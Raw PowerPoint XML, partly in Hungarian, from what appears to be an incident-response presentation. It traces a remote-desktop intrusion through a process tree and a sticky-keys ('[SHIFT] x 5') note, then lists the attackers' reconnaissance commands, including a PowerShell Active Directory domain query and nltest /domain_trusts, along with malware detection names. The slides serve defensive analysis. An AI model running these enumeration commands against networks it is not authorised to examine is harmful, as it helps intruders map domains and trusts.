          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13341700" y="914400"/>
              <a:ext cx="2726051" cy="834390"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:no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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iexplore.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grp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162CFEA8-4DD6-6A70-D2FD-4FF4443D8F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14013142" y="5491253"/>
            <a:ext cx="4187982" cy="735190"/>
            <a:chOff x="9280112" y="7261478"/>
            <a:chExt cx="4187982" cy="735190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="360" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EEAC9CB-0BB2-9ADF-AAAC-AA549BDB0E50}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9549768" y="7261478"/>
              <a:ext cx="3918326" cy="735190"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln cap="rnd">
              <a:noFill/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="63500">
                <a:srgbClr val="D80B55">
                  <a:alpha val="40000"/>
                </a:srgbClr>
              </a:glow>
              <a:outerShdw blurRad="381000" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
                <a:srgbClr val="D80B55"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0" defTabSz="1371600"/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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>Command Line</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>: </a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="1600" kern="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding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Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="361" name="Graphic 360">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2057FFF8-BB04-0610-416B-2F842DEBC9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9280112" y="7304609"/>
              <a:ext cx="264171" cy="283513"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grp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8A781464-744C-D62F-02B9-FDA941D5E13A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2886651" y="3039897"/>
            <a:ext cx="1674405" cy="442159"/>
            <a:chOff x="12235545" y="1103018"/>
            <a:chExt cx="1902758" cy="468180"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="371" name="Rounded Rectangle 75">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBEB3C6D-E9CB-9D54-E360-99F400DAF580}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12235545" y="1103018"/>
              <a:ext cx="1902757" cy="468180"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000D13"/>
            </a:solidFill>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D5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9489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K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2" name="Rectangle: Rounded Corners 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F9FEFD3-8041-82DF-7331-552AA621AD24}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="12324833" y="1138270"/>
              <a:ext cx="1813470" cy="413599"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/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18113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solas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>winlogon.exe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="369" name="Rectangle: Rounded Corners 368">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2F1F61D-E0E2-AC8E-3779-F0AE32019845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544080" y="5705913"/>
            <a:ext cx="2909979" cy="104741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[SHIFT] x 5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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F427A86B-6E2F-1170-96AE-A7005D330F91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="417810" y="4375133"/>
            <a:ext cx="3031779" cy="3096136"/>
            <a:chOff x="417810" y="4375133"/>
            <a:chExt cx="3031779" cy="3096136"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Elbow Connector 133">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B28684E-1E84-D107-EDAF-D18F0E7DBD6D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="5" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="260808" y="4895772"/>
              <a:ext cx="583229" cy="218109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BD6E44FB-303F-CDF4-6FB5-629D7FE1D79C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1093728" y="6683254"/>
              <a:ext cx="2355861" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="2677150" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13C9E4DE-3581-BF4A-4F40-CCFD56DBF795}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2666325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54" name="Graphic 53">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F51C6566-185D-6944-244D-0519B13F63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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="55" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28CBA478-6B76-E9AE-CDA8-71E781AAB5A2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1935834" cy="834390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rdpshell.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="56" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8847790D-FF96-3D77-3C1D-771497F1F907}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="53" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="153380" y="6142121"/>
              <a:ext cx="1564948" cy="315748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A148E33B-9AB1-B99B-89CA-5BFBE3EF5CF9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1044004" y="5677075"/>
              <a:ext cx="2291285" cy="788015"/>
              <a:chOff x="12600383" y="914400"/>
              <a:chExt cx="2603767" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="88" name="Rounded Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FD540C8-4D83-0FB6-E730-6A9CBA700041}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600383" y="1103018"/>
                <a:ext cx="2571294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89" name="Graphic 88">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE6FF426-398B-286C-2F79-2CDD6A1C27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/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="90" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CEF861C-0C1F-46B6-9665-4B9083C93BC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341700" y="914400"/>
                <a:ext cx="1862450" cy="834390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outlook.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="91" name="Elbow Connector 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99BB23DC-95A0-A3DD-1FF7-E2A0692CBED4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:endCxn id="88" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="485496" y="5517782"/>
              <a:ext cx="851690" cy="265326"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector2">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="424D56"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:tailEnd type="arrow"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:cxn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147B8B9-2F0C-E0E2-4C6A-C7DF1B04B41D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="661477" y="4897227"/>
              <a:ext cx="2768022" cy="788015"/>
              <a:chOff x="12600384" y="914400"/>
              <a:chExt cx="3145521" cy="834390"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rounded Rectangle 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B892289B-4833-42A7-D910-EE2817885BD9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12600384" y="1103018"/>
                <a:ext cx="2404204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6" name="Graphic 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{370A7D3C-7CE1-4735-347A-4962CEC4BA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rcRect/>
              <a:stretch/>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="12766356" y="1162059"/>
                <a:ext cx="549560" cy="335445"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9693704F-8833-12DF-0D1B-B4A3A2FDDD7A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="13341701" y="914400"/>
                <a:ext cx="2404204" cy="834390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rdpinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="373" name="Group 372">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EDDF4B0-FAE0-3C32-5E1F-18BA02A360C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="417810" y="4375133"/>
              <a:ext cx="1768546" cy="442159"/>
              <a:chOff x="12235545" y="1103018"/>
              <a:chExt cx="2009738" cy="468180"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="374" name="Rounded Rectangle 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB921649-BBED-8EEE-F9E4-EBAE7804AB4B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12235545" y="1103018"/>
                <a:ext cx="2009737" cy="468180"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="000D13"/>
              </a:solidFill>
              <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="424D56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94899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SK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5" name="Rectangle: Rounded Corners 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92E92EC9-3871-A864-CF28-F963602D7C3A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="12379151" y="1139122"/>
                <a:ext cx="1866132" cy="431225"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="1079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181138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onsolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                    <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                  </a:rPr>
                  <a:t>userinit.exe</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Elbow Connector 133">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7CB526D-8B0D-271A-6A87-8447CD4C8673}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="375" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2173535" y="3517779"/>
            <a:ext cx="1107902" cy="1082259"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="424D56"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="arrow"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Rectangle 395">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDDF13B-218C-67EC-2420-3B9118420222}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4303805" y="7082468"/>
            <a:ext cx="2982819" cy="221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9" name="Straight Arrow Connector 398">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B281D80C-311C-4B98-1B3B-284C2BA42013}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="369" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3454059" y="5249951"/>
            <a:ext cx="899962" cy="979671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2" name="Straight Arrow Connector 401">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49547ABE-7572-DEBD-6551-ADDC0B757E8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="396" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7286624" y="5354983"/>
            <a:ext cx="1439914" cy="183802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Straight Arrow Connector 404">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B15A01E-F742-D7DE-D4B6-6BD10F527CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="314" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="11227032" y="4698593"/>
            <a:ext cx="2155888" cy="132505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Kép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91448" y="0"/>
            <a:ext cx="189574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3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52634-4176-0E12-5E7C-6199C5FC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Megszerezték a hozzáférést</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t> Mit csináltak?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21079-56E1-3AD4-9269-C9C4CBB09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0142" y="3550101"/>
            <a:ext cx="7658013" cy="6495236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>systeminfo.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>tasklist.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Hibás</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2800" dirty="0" smtClean="0"/>
              <a:t>parancs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>powershell.exe '-c "=[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>System.DirectoryServices.ActiveDirectory.Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>]::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>GetCurrentDomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>();='LDAP://’.; &lt;snip&gt;"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>nltest.exe /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>domain_trusts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>whoami.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ipconfig.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ping.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Procexp64.exe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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186836-A80E-873D-91B3-791BD34CCA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9140" y="2121924"/>
            <a:ext cx="7754697" cy="1325564"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Felderítés</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>PowerShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>ben</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="3600" dirty="0" smtClean="0"/>
              <a:t> futtatott parancsok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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C769B-A86C-CAF2-CCF8-60FBC37B2F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73722" y="3259722"/>
            <a:ext cx="7658013" cy="7027278"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Internet Explorer, MS Edge, Chrome</a:t>
            </a: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URL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Urlik.AAF</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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Win64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GenKryptik.GTKR</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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MSIL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riskware.BloodHound.D</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRP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MSIL/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
